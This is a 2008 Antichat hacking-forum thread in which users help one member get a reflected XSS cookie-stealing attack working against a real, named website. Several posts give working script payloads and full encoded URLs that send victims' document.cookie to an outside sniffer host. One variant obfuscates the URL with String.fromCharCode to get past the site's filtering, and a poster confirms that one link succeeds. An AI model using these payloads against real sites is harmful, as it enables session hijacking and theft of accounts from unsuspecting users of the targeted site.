ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

не шлются кукисы
  #1  
Старый 04.08.2008, 20:44
Аватар для popel
popel
Новичок
Регистрация: 15.08.2007
Сообщений: 9
Провел на форуме:
246741

Репутация: 0
Отправить сообщение для popel с помощью ICQ
По умолчанию не шлются кукисы

Допустим есть пассив xss, юзаю снифф каника
http://www.blizko.ru/goodlist?q=1%22%3E%3Cscript%3Ealert('hacked%20by%2 0VITAL')%3C/script%3E&url=http://vital.h.com.ua

заменяю на
http://www.blizko.ru/goodlist?q=1%22%3E%3Cscript%3Edocument.location.hr ef='http://xxx.ru/s.gif?'+document.cookie%3C/script%3E&url=http://vital.h.com.ua не перенапрявляет на снифф=>кукисы не шлются
обрабатывается тока
http://www.blizko.ru/goodlist?q=1%22%3E%3Cscript%3Edocument.location.hr ef='http://xxx.ru/s.gif'%3C/script%3E&url=http://vital.h.com.ua
Пробовал с разными xss
Не пинать)))

Последний раз редактировалось popel; 04.08.2008 в 21:20..
 

  #2  
Старый 04.08.2008, 21:08
Аватар для .nor
.nor
Познающий
Регистрация: 29.06.2007
Сообщений: 51
Провел на форуме:
1650734

Репутация: 14
По умолчанию

Вместо "xxx.ru/s.gif?" попробуй "http://xxx.ru/s.gif?"
 

  #3  
Старый 04.08.2008, 21:19
Аватар для popel
popel
Новичок
Регистрация: 15.08.2007
Сообщений: 9
Провел на форуме:
246741

Репутация: 0
Отправить сообщение для popel с помощью ICQ
По умолчанию

я так и делал, просто в теме неправильно указал, уже исправил
 

  #4  
Старый 04.08.2008, 21:36
Аватар для .nor
.nor
Познающий
Регистрация: 29.06.2007
Сообщений: 51
Провел на форуме:
1650734

Репутация: 14
По умолчанию

Код:
"><script>img = new Image(); img.src = "http://xxx.ru/s.gif?"+document.cookie;</script>
Это робит?
 

  #5  
Старый 04.08.2008, 21:48
Аватар для freddi
freddi
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
Провел на форуме:
2943499

Репутация: 807
По умолчанию

? и + фильтруются.
 

  #6  
Старый 04.08.2008, 21:50
Аватар для Don1=2
Don1=2
Участник форума
Регистрация: 10.09.2007
Сообщений: 131
Провел на форуме:
829460

Репутация: 170
По умолчанию

"><script>img = new Image(); img.src = String.fromCharCode(104,116,116,112,58,47,47,120,1 20,120,46,114,117,47,115,46,103,105,102,63)+docume nt.cookie;</script>
или так
я имею ввиду http://xxx замени на String.fromCharCode(
можно на don12.vip.su

Последний раз редактировалось Don1=2; 04.08.2008 в 21:55..
 

  #7  
Старый 04.08.2008, 22:09
Аватар для popel
popel
Новичок
Регистрация: 15.08.2007
Сообщений: 9
Провел на форуме:
246741

Репутация: 0
Отправить сообщение для popel с помощью ICQ
По умолчанию

пробовал вышеизложенное, не робит
на примере показать бы

http://www.blizko.ru/goodlist?q=1%22%3E%3Cscript%3Ealert('ggg')%3C/script%3E&url=http://vital.h.com.ua

заменяю alert('ggg') на "><script>img = new Image(); img.src = "http://xxx.ru/s.gif?"+document.cookie;</script>
резальта нет( или неправильный код?)
 

  #8  
Старый 04.08.2008, 22:16
Аватар для .nor
.nor
Познающий
Регистрация: 29.06.2007
Сообщений: 51
Провел на форуме:
1650734

Репутация: 14
По умолчанию

я пробовал своим так
Код:
http://www.blizko.ru/goodlist?q=%22%3E%3Cscript%3Eimg+%3D+new+Image%28%29%3B+img.src+%3D+%22http%3A%2F%2Fxxx.ru%2Fs.gif%3F%22%2Bdocument.cookie%3B%3C%2Fscript%3E
работает. Снифф точно рабочий?
 

  #9  
Старый 04.08.2008, 23:23
Аватар для popel
popel
Новичок
Регистрация: 15.08.2007
Сообщений: 9
Провел на форуме:
246741

Репутация: 0
Отправить сообщение для popel с помощью ICQ
По умолчанию

.nor, спс
Всё выполнилось, используя твой посл код))
тока после этого попробовал сам
http://www.blizko.ru/goodlist?q=%22%3E%3Cscript%3Eimg = new Image(); img.src = "http://xxx.ru/s.gif?"+document.cookie;%3C/script%3E - не робит)
Какой исходный код? без обработки браузером, а то хз %3D,%2F чего откуда)))))
 

  #10  
Старый 04.08.2008, 23:33
Аватар для [Raz0r]
[Raz0r]
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717

Репутация: 1980
Отправить сообщение для [Raz0r] с помощью ICQ
По умолчанию

Код:
"><script>img = new Image(); img.src = "http://xxx.ru/s.gif?"+document.cookie;</script>
 
Закрытая тема



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Кукисы k0lbasa Болталка 9 27.05.2008 00:46
Кукисы в phpbb, что с ними делать? =) Manoz Форумы 11 01.01.2007 15:51



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ